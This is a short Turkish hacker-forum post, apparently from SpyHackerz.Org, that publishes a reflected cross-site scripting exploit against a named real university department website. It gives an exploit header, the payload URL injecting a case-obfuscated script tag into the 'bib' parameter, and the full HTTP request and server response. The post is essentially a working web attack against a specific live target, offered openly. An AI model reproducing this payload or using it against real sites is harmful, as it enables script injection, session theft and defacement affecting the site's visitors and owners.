Bir an Önce Bildirmemiz Lazım
Bi Kaç Dakka Önce Buldum.
Devami Vardır...
Bi Kaç Dakka Önce Buldum.
Devami Vardır...
Kod:
# Exploit Title : İstanbul Teknik University Elektronik ve Haberleşme Mühendisliği Bölümü XSS
# Author [ Discovered By ] : Dj_Taleh / SpyHackerz.Org
# Date : 04/03/2020
# Vendor Homepage : http://www.ehb.itu.edu.t r/
# Tested On : Windows and Linux
# Category : WebApps
# Exploit Risk : Medium
# Vulnerability Type : CWE-79
/index.php?bib='"()&%1<ScRiPt >prompt(912383)</ScRiPt>&id=bibtexbrowser&lang=tr&year=2016
Request
GET /index.php?bib=%27%22%28%29%26%251%3cScRiPt%20%3eprompt%28912383%29%3c%2fScRiPt%3e&id=bibtexbrowser&lang=tr&year=2016 HTTP/1.1
Host: www.ehb.itu.edu.t r
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)
Accept: */*
Response
HTTP/1.1 200 OK
Date: Mon, 02 Mar 2020 20:59:17 GMT
Server: Apache
Vary: Accept-Encoding
Cache-Control: private, must-revalidate
Expires: Mon, 02 Mar 2020 21:09:17 GMT
Content-Length: 17802
Keep-Alive: timeout=15, max=31
Connection: Keep-Alive
Content-Type: text/html
